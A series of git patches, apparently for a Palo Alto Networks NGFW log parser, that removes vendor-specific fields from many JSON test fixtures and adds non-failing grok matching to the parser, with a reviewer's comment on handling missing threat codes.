+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json
@@ -36,10 +36,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "fb"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json
index 2d21571e0..c773195d0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json
@@ -30,11 +30,6 @@
 "serial_number": "016201000000"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
- "EventID": "test-event",
 "Threat_ContentType": "vpn"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json
index 8a299b691..70c358caf 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json
@@ -34,10 +34,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json
index 4b7dc612f..b481b6c39 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json
@@ -30,10 +30,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "url-filtering"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json
index 7901b05ce..989c8393e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json
@@ -37,10 +37,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "dhcp"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json
index 30a9a9970..a92e1d91b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json
@@ -33,10 +33,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json
index f74ff5a47..c546509c6 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json
@@ -30,10 +30,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json
index 8c122fc65..452b9d6bb 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json
@@ -29,10 +29,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json
index 524aef010..4b2a51b0f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json
@@ -30,10 +30,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json
index f305c2d3e..36807c11d 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json
@@ -30,10 +30,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json
index 63f3bd258..a83bce94f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json
@@ -30,10 +30,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json
index a00e82987..548954584 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json
@@ -32,10 +32,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json
index 9cb10263a..cd41f06d0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json
@@ -33,10 +33,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json
index 2aa5ce29e..2130588d1 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json
@@ -30,10 +30,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
index 51579bdcb..db55cc61a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
@@ -47,15 +47,9 @@
 "serial_number": "016201000000"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "url",
- "VirtualLocation": "vsys1",
 "threat": {
- "id": "9999",
- "type": "URL filtering log"
+ "id": "9999"
 }
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json
index eadb40265..196fc9c0c 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json
@@ -57,16 +57,10 @@
 "serial_number": "012345678910"
 },
 "paloalto": {
- "DGHierarchyLevel1": "320",
- "DGHierarchyLevel2": "90",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "vulnerability",
- "VirtualLocation": "vsys1",
 "threat": {
 "id": "95187",
- "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability",
- "type": "custom threat"
+ "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability"
 }
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json
index d2e4e4775..bc3ccb698 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json
@@ -30,11 +30,6 @@
 "serial_number": "026701002348"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
- "EventID": "general",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json
index c0f834538..cc477a27e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json
@@ -59,13 +59,7 @@
 "serial_number": "007954000351998"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
- "Threat_ContentType": "end",
- "URLCategory": "any",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "end"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json
index cfa92faf3..72bc384fb 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json
@@ -59,13 +59,7 @@
 "serial_number": "007954000351998"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
- "Threat_ContentType": "end",
- "URLCategory": "any",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "end"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json
index 2f58900ab..4657c725b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json
@@ -29,10 +29,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json
index 9a1d42f34..b22a31f88 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json
@@ -29,10 +29,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json
index ea53d3353..9f659a601 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json
@@ -29,10 +29,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "auth"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json
index dee27d0e1..d2477e4f1 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json
@@ -30,14 +30,7 @@
 "serial_number": "01545100000000"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
- "EventID": "0",
- "Threat_ContentType": "login",
- "VirtualLocation": "vsys1",
- "VirtualSystemID": "1"
+ "Threat_ContentType": "login"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json
index 23d0aaaf8..a3738eaf2 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json
@@ -32,10 +32,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json
index c3b8bcffc..42b530f45 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json
@@ -37,10 +37,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "fb"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json
index 57cb1121b..4e097a01e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json
@@ -59,16 +59,9 @@
 "serial_number": "016401004874"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "url",
- "VirtualLocation": "vsys",
- "VirtualSystemName": "VSYS",
 "threat": {
- "id": "9999",
- "type": "URL filtering log"
+ "id": "9999"
 }
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json
index afc856776..207cd20b3 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json
@@ -72,24 +72,6 @@
 },
 "paloalto": {
 "DirectionOfAttack": "server to client",
- "PanOSContainerNameSpace": "pns_default",
- "PanOSDestinationDeviceCategory": "X-Phone",
- "PanOSDestinationDeviceHost": "pan-622",
- "PanOSDestinationDeviceMac": "620797415366",
- "PanOSDestinationDeviceModel": "MI",
- "PanOSDestinationDeviceOSFamily": "A1",
- "PanOSDestinationDeviceOSVersion": "Android v9.1",
- "PanOSDestinationDeviceProfile": "x-profile",
- "PanOSDestinationDeviceVendor": "Xiaomi",
- "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
- "PanOSSourceDeviceHost": "pan-505",
- "PanOSSourceDeviceModel": "Note 4G",
- "PanOSSourceDeviceProfile": "x-profile",
- "PanOSSourceDeviceVendor": "Lenovo",
- "PanOSSourceLocation": "LY",
- "PanOSThreatCategory": "unknown",
- "PanOSThreatID": "27379(27379)",
- "VirtualLocation": "vsys1",
 "endpoint": {
 "serial_number": "xxxxxxxxxxxxxx"
 },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json
index 20a78b306..cff329e0f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json
@@ -51,16 +51,10 @@
 "serial_number": "001701000000"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "vulnerability",
- "VirtualLocation": "vsys",
 "threat": {
 "id": "34805",
- "name": "PDF Exploit Evasion Found",
- "type": "vulnerability exploit detection"
+ "name": "PDF Exploit Evasion Found"
 }
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json
index 4fd068d08..b74fdb564 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json
@@ -72,12 +72,6 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, - "paloalto": { - "PanOSSessionStartTime": "Jul 31 2022 12:43:06", - "PanOSSourceLocation": "10.0.0.0-10.255.255.255", - "URLCategory": "computer-and-internet-info", - "VirtualLocation": "vsys1" - }, "related": { "hosts": [ "LF-5698-NR" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json index a892a2a7b..1469faf57 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json @@ -72,12 +72,6 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, - "paloalto": { - "PanOSSessionStartTime": "Aug 02 2022 06:41:44", - "PanOSSourceLocation": "10.0.0.0-10.255.255.255", - "URLCategory": "low-risk", - "VirtualLocation": "vsys1" - }, "related": { "hosts": [ "GP cloud service" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json index 58c77fa30..9bf8bd0de 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json 
@@ -78,29 +78,6 @@ "version": "2.0" }, "paloalto": { - "PanOSContainerName": "pan-dp-77754f4", - "PanOSContainerNameSpace": "pns_default", - "PanOSDestinationDeviceCategory": "N-Phone", - "PanOSDestinationDeviceHost": "pan-355", - "PanOSDestinationDeviceMac": "530589561221", - "PanOSDestinationDeviceModel": "Nexus", - "PanOSDestinationDeviceOSFamily": "H1511", - "PanOSDestinationDeviceOSVersion": "Android v7", - "PanOSDestinationDeviceProfile": "n-profile", - "PanOSDestinationDeviceVendor": "Google", - "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", - "PanOSGPHostID": "xxxxxxxxxxxxxx", - "PanOSHASessionOwner": "session_owner-4", - "PanOSSessionStartTime": "Feb 27 2021 20:15:48", - "PanOSSourceDeviceHost": "pan-301", - "PanOSSourceDeviceModel": "Nexus", - "PanOSSourceDeviceProfile": "n-profile", - "PanOSSourceDeviceVendor": "Google", - "PanOSSourceDynamicAddressGroup": "aqua_dag", - "PanOSSourceLocation": "east-coast", - "PanOSX-Forwarded-ForIP": "1.1.1.1", - "URLCategory": "custom-category", - "VirtualLocation": "vsys1", "endpoint": { "serial_number": "xxxxxxxxxxxxxx" } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json index 3445ddc4f..1621cfeed 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json @@ -49,8 +49,7 @@ "serial_number": "026701002040" }, "paloalto": { - "Threat_ContentType": "end", - "VirtualLocation": "vsys1" + "Threat_ContentType": "end" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json index 3238eb5e4..324587ad2 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json 
@@ -49,8 +49,7 @@ "serial_number": "1801017000" }, "paloalto": { - "Threat_ContentType": "deny", - "VirtualLocation": "vsys1" + "Threat_ContentType": "deny" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json index 41d495725..f3a6b58d6 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json @@ -77,25 +77,6 @@ }, "paloalto": { "DirectionOfAttack": "server to client", - "PanOSContainerName": "pan-dp-77754f4", - "PanOSContainerNameSpace": "pns_default", - "PanOSDestinationDeviceCategory": "L-Phone", - "PanOSDestinationDeviceHost": "pan-506", - "PanOSDestinationDeviceMac": "150083646537", - "PanOSDestinationDeviceModel": "Note XT", - "PanOSDestinationDeviceOSFamily": "K8", - "PanOSDestinationDeviceOSVersion": "Android v8", - "PanOSDestinationDeviceProfile": "l-profile", - "PanOSDestinationDeviceVendor": "Lenovo", - "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", - "PanOSSourceDeviceHost": "pan-505", - "PanOSSourceDeviceModel": "Note 4G", - "PanOSSourceDeviceProfile": "l-profile", - "PanOSSourceDeviceVendor": "Lenovo", - "PanOSSourceDynamicAddressGroup": "blue_dag", - "PanOSSourceLocation": "west-coast", - "URLCategory": "sports", - "VirtualLocation": "vsys1", "endpoint": { "serial_number": "xxxxxxxxxxxxxx" } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json index c90ab6ed6..ea8e442b5 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json @@ -53,10 +53,6 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, - "paloalto": { - "VirtualLocation": "vsys1", - "VirtualSystemID": "1" - }, "related": { "hosts": [ "PA-5220" 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json index edd76521b..8c7d37227 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json @@ -60,13 +60,8 @@ "serial_number": "111111111111" }, "paloalto": { - "DGHierarchyLevel1": "997", - "DGHierarchyLevel2": "738", - "DGHierarchyLevel3": "0", - "DGHierarchyLevel4": "0", "DirectionOfAttack": "server to client", "Threat_ContentType": "wildfire", - "VirtualLocation": "vsys1", "endpoint": { "serial_number": "xxxxxxxxxxx" }, From 6ce2c1b151887cb499e7b797784a3f6d3e5ef6f6 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 30 Oct 2024 14:47:11 +0200 Subject: [PATCH 186/317] Fix raising errors in PaloAlto NGFW --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index 84ad45ff1..79a12ce3b 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -436,6 +436,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.EventDescription}}" pattern: "%{SYSTEM_AUTH_AUTHENTICATION_FOR}|%{CONNECTION}|%{CONTENT}|%{WILDFIRE}|%{NETWORK}|%{PANDB_GENERIC}|%{CLOUD_ELECTION}|%{AUTHENTICATION}" custom_patterns: @@ -468,6 +469,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.Threat_ContentName}}" pattern: '%{DATA:threat_description}?\(%{NUMBER:threat_code}\)' From e672bf5ba6d928e51da0228c78897a826875cd5b Mon Sep 17 00:00:00 2001 
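Review bot: Adding `raise_errors: false` to the `Threat_ContentName` grok (second hunk, pattern `%{DATA:threat_description}?\(%{NUMBER:threat_code}\)`) turns a non-matching name into a silent no-op, so `threat_code` and `threat_description` are simply absent for such events and nothing in the parser output records that the extraction was skipped; the same applies to the `EventDescription` grok in the first hunk. Any later stage that builds `paloalto.threat.id` or similar from `threat_code` needs to tolerate the missing field rather than assume it, and a fixture with a name that lacks the `(NNNN)` suffix should pin the fall-through shape, since none of the fixtures in this series exercises it. I would document the intent next to the flag, e.g. `# free-text names without "(id)" are expected: do not fail the event, downstream must handle missing threat_code`. Both hunks begin at `external:`, so the enclosing stage definitions start outside the hunk.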
From: lvoloshyn-sekoia Date: Wed, 30 Oct 2024 16:39:58 +0200 Subject: [PATCH 187/317] Fix PaloAlto NGFW parser and tests --- .../paloalto-ngfw/ingest/parser.yml | 16 ++++++------- .../paloalto-ngfw/tests/User_id_1_csv.json | 9 +++++++- .../paloalto-ngfw/tests/User_id_2_csv.json | 9 +++++++- .../paloalto-ngfw/tests/auth_cef.json | 7 ++++++ .../paloalto-ngfw/tests/decryption_cef.json | 3 +++ .../paloalto-ngfw/tests/file_cef.json | 4 ++++ .../paloalto-ngfw/tests/fix_bug_with_int.json | 3 ++- .../tests/fix_bug_without_int.json | 3 ++- .../tests/globalprotect_cef.json | 1 + .../tests/globalprotect_csv.json | 2 ++ .../tests/globalprotect_csv_2.json | 2 ++ .../paloalto-ngfw/tests/hip_match_cef.json | 3 +++ .../paloalto-ngfw/tests/icmp_allow_csv.json | 3 ++- .../paloalto-ngfw/tests/iptag_cef.json | 4 ++++ .../tests/network_threat_alert_1.json | 8 ++++++- .../tests/network_threat_alert_2.json | 9 +++++++- .../paloalto-ngfw/tests/sctp_cef.json | 4 ++++ .../paloalto-ngfw/tests/system_csv.json | 5 ++++ .../paloalto-ngfw/tests/tcp_allow_csv.json | 3 ++- .../tests/test_cloud_election_json.json | 4 ++++ .../tests/test_dhcp_renew_json.json | 4 ++++ .../tests/test_dns_proxy_json.json | 4 ++++ .../tests/test_file_alert_json.json | 8 ++++++- .../tests/test_globalprotect.json | 2 ++ .../tests/test_installed_package_json.json | 4 ++++ .../tests/test_ldap_brute_force.json | 5 ++++ .../tests/test_new_file_type.json | 8 ++++++- .../tests/test_new_globalprotect.json | 5 ++++ .../tests/test_new_threat_type.json | 5 ++++ .../tests/test_new_url_type.json | 8 ++++++- .../tests/test_ntp_sync_json.json | 4 ++++ .../tests/test_port_up_json.json | 4 ++++ .../tests/test_registration_succeed_json.json | 4 ++++ .../paloalto-ngfw/tests/test_system.json | 5 ++++ .../tests/test_system_event_10_json.json | 4 ++++ .../tests/test_system_event_11_json.json | 4 ++++ .../tests/test_system_event_12_json.json | 4 ++++ .../tests/test_system_event_1_json.json | 4 ++++ .../tests/test_system_event_2_json.json | 4 
